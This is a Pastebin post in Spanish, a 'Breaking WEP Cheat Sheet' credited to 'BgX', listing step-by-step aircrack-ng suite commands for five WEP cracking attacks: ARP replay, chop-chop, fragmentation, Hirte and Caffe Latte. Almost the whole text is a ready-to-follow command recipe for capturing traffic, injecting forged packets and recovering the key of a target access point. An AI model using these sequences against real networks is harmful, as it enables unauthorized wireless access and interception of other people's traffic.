Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ***Breaking WEP Cheat Sheet***
- #Sacada de una ezine que ahorita no tengo la mano, pero estos son los ataques al
- #protocolo WEP, en resumen. Lo mas importante es saber como funcionan estos ataques y
- #en que escenarios nos podrían servir ;).
- #Ch33rS
- #by BgX
- RESUMEN 1 + 3 ATTACK
- 1. airmon-ng start <interfaz de red>
- 2. airodump-ng --bssid <BSSID del AP> -c <canal del AP> -w <nombre del
- archivo donde se guardaran la captura> <interfaz>
- 3. aireplay-ng -1 <tiempo entre cada asociación> -e <ESSID del AP> -a
- <BSSID del AP> -h <nuestra mac> <interfaz>
- 4. aireplay-ng -3 -x <velocidad de inyección> -b <BSSID del AP> -h
- <nuestra mac> <interfaz>
- 5. aircrack-ng <archivo captura .cap>
- RESUMEN CHOP CHOP ATTACK
- 1. airmon-ng start <interfaz de red>
- 2. airodump-ng --bssid <BSSID del AP> -c <canal del AP> -w <nombre del
- archivo donde se guardaran la captura> <interfaz>
- 3. aireplay-ng -1 <tiempo entre cada asociación> -e <ESSID del AP> -a
- <BSSID del AP> -h <nuestra mac> <interfaz>
- 4. aireplay-ng -4 -b <BSSID del AP> -h <nuestra MAC> <interfaz>
- 5. tcpdump -s 0 -n -e -r <archivo .cap generado antes>
- 6. packetforge-ng -0 -a <BSSID del AP> -h <nuestra MAC> -k <ip dentro del
- rango> -l <ip obtenida antes> -y <archivo .xor obtenido antes> -w
- <archivo a reinyectar>
- 7. aireplay-ng -2 -h <nuestra MAC> -r <archivo creado en el paso anterior>
- <interfaz>
- 8. aircrack-ng <archivo de captura .cap>
- RESUMEN FRAGMENTACIÓN ATTACK
- 1. airmon-ng start <interfaz de red>
- 2. airodump-ng --bssid <BSSID del AP> -c <canal del AP> -w <nombre del
- archivo donde se guardaran la captura> <interfaz>
- 3. aireplay-ng -1 <tiempo entre cada asociación> -e <ESSID del AP> -a
- <BSSID del AP> -h <nuestra mac> <interfaz>
- 4. aireplay-ng -5 -b <BSSID del AP> -h <nuestra MAC> <interfaz>
- 5. packetforge-ng -0 -a <BSSID del AP> -h <nuestra MAC> -k <ip dentro del
- rango> -l <ip obtenida antes> -y <archivo .xor obtenido antes> -w
- <archivo a reinyectar>
- 6. aireplay-ng -2 -h <nuestra MAC> -r <archivo creado en el paso anterior>
- <interfaz>
- 7. aircrack-ng <archivo de captura .cap>
- RESUMEN HIRTE ATTACK
- 1. airmon-ng start <interfaz de red>
- 2. airodump-ng --bssid <BSSID del AP> -c <canal del AP> -w <nombre del
- archivo donde se guardaran la captura> <interfaz>
- 3. airbase-ng -c <canal de AP objetivo> -e <ESSID del punto de acceso objetivo>
- -N -W 1 <interfaz>
- 4. aircrack-ng <archivo de captura .cap>
- RESUMEN CAFFE LATTE ATTACK
- 1. airmon-ng start <interfaz de red>
- 2. airodump-ng --bssid <BSSID del AP> -c <canal del AP> -w <nombre del
- archivo donde se guardaran la captura> <interfaz>
- 3. airbase-ng -c <canal de AP objetivo> -e <ESSID del punto de acceso objetivo>
- -L -W 1 <interfaz>
- 4. aircrack-ng <archivo de captura .cap>
Add Comment
Please, Sign In to add comment